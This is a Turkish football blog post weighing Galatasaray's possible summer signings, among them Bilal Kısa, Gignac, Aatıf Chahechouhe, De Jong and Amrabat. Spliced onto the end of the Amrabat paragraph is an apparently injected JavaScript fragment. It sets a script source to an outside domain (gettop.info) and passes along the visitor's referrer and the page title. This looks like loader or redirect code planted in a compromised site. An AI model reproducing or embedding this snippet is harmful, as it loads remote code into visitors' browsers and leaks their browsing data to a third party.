Galatasaray’da Transfer Değerlendirmesi

Turkey superlig match between Galatasaray and Akhisar Belediye at Turk Telekom Arena Stadium in Ista

Transfer sezonu açıldı ve aslında çoğumuz transfer söylentilerini resmi sezon açılışından çok önce duymaya başlıyoruz. Yazılanlar çizilenler bazen kulüpler tarafından yalanlansa da bu haberlerin doğru olduğuna da pek çok kez tanıklık ettik. Bu yazıda Galatasarayın bu sezonki transfer politikasını ele alıyorum.

Galatasaray’ın önümüzdeki yıl direkt olarak tekrar Şampiyonlar Ligi’nde yarışacak olması sebebiyle transfere daha iyi bir büyçe ayırması gerektiği düşünülebilir fakat eski yönetimden kalan borçlar vs. de göz önüne alındığında aslında bu tabloda yönetimin yeni çilekler getirmesini beklemek çok da mantıklı değil. Mevcut kadro bu yıl şampiyonluğa ulaşsa da gelecek sezon için Avrupa’da yeterli değil. Takviye gerekli. O halde yönetime de en iyileri ve bütçeye en uygun olanları bulma anlamında hayli iş düşüyor.

BİLAL KISA
Öncelikle henüz resmiyete kavuşmasa da bu transferi artık gerçekleşmiş olarak kabul ediyoruz ve o yüzden de Bilal Kısa transferiyle başlamak istedim.
32 yaşında, tecrübesiyle dikkat çeken Bilal, Akhisar Belediyespor’da adeta Hamza hocanın Selçuk İnan’ıydı. Orta sahada yüksek pas yüzdesi, iyi top hakimiyeti ve uzak mesafeden kaydettiği gollerle dikkat çekmeyi başardı. Galatasaray’da direk 11 oyuncusu olabileceğini düşünmüyorum fakat Bilal hakkında özellikle yaşını göz önünde bulundurarak yapılan eleştirilerin bir çoğuna da katılmıyorum ve iyi bir alternatif olabileceğini düşünüyorum. Enerjisini sonradan oyuna girdiği maçlarda iyi kullanabilirse Galatasaray’a kesinlikle faydalı olur. Yabancı sınırının kalkmasının ardından tabii ki o bölgeye yabancı alternatifler de düşünülebilirdi ama Galatasaray’ın bulunduğu mali durum da göz önüne alındığında bu biraz zor. Kadrodaki mevcut alternatif oyunculardan Yekta Kurtuluş’un yıllardır istenileni veremediğini göz önünde bulundurursak bence Bilal Kısa transferi o bölgede Hamza Hoca’nın elini oldukça rahatlatacak.

ANDRE PIERRE GIGNAC
Şimdi gelelim söylentilere.;

Gignac uzun zamandır gazete manşetlerini süslüyor. Avrupada takip edilen bir oyuncu. Galatasaray’ın bu transfer için rakibi oldukça fazla çünkü Gignac’ın bonservisi elinde ve Avrupada da bir çok kulüp onu istiyor. Bu sezon oldukça önemli bir gol ortalaması yakalamış ve güçlü fiziğiyle stoperler için tehdit oluşturabilecek bir oyuncu. Hamza hocanın Burak Yılmazı kesinlikle kadroda tutmak isteyişini de düşünürsek olası bir Gignac transferiyle birlikte hoca tekrar çift santrforlu sisteme dönebilir. Ligimizde bu sistem iyi sonuç verebilir fakat ben Avrupa’da Gignac ve Burak Yılmaz ikilisinden oluşan bir forvet hattıyla oluşan 4-4-2 tarzı sistemlerin pek iyi sonuçlar verebileceğini düşünmüyorum.

AATIF CHAHECHOUHE
Bu transfer gerçekleşirse bence Galatasaray adına sezonun transferi olur. Sivasspor’da çok beğenerek takip ettiğim bir oyuncu ve yetenekleri, hızı, gücüyle ligin üzerinde bir futbolcu. Avrupa kupaları için ne kadar yeterli olur orası tartışılır fakat ligimiz için oldukça yararlı bir transfer olur. Amrabat transfer edilirken de aynı düşünceye sahiptim ve hayalkırıklığına uğradım diyebilirim fakat Aatıf, gerek fiziksel gerek konsantrasyon vs. gibi özellikler açısından Amrabat’tan çok daha iyi bir oyuncu. Tabii ki 29 yaşında olduğu için geleceğe yönelik bir hamle olamaz ama ligi de çok iyi tanıdığı için Galatasaray’a kısa sürede çok şey katabilir.

NIGEL DE JONG
Genel anlamda Felipe Melo’yu aratacağını düşünmüyorum. Zaten oyuncu özellikleri bakımından da birbirine çok yakın iki oyuncudan bahsediyoruz ve en önemli özellikleri agresif oluşları. Felipe Melo’nun gitmesi halinde De Jong’un kadroya katılması bence bu mevki için en doğru tercih olur. Mücadeleci kimliğiyle ön plana çıkan De Jong da genç bir oyuncu değil fakat Hollanda çıkışlı olması ve önemli bir kariyere sahip olması onu bu mevkide önemli kılıyor. Avrupada da Hamza Hocanın tıpkı Melo gibi vazgeçemediği oyunculardan olur.

AMRABAT
Kayserispor’dan transfer edildiğinde herkes çok heyecanlanmıştı. Çok şeyler beklendi ondan belki de sırf bu baskıyı kaldıramadığı için iyi işlere imza atamadı Galatasaray formasıyla. Malaga macerası onu bu anlamda olgunlaştırmak için iyi bir tercihti bence. Mental açıdan daha iyi bir Amrabat ile karşılaşırsak onun da potansiyelinin tamamını yansıtması durumunda çok önemli bir oyuncu olacağı kanaatindeyim. Yasin Öztekin, Bruma, Olcan Adın ve gerçekleşirse Aatıf gibi çok önemli rakipleri var mevkiinde. Bu yarış ona zarar mı verecek onu daha çok mu güçlendirecek göreceğiz.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

adet yorum. Siz de yorumunuzu aşağı yazabilirsiniz.

Yazar: Futbol Akademi

info@futbolakademi.net

Paylaş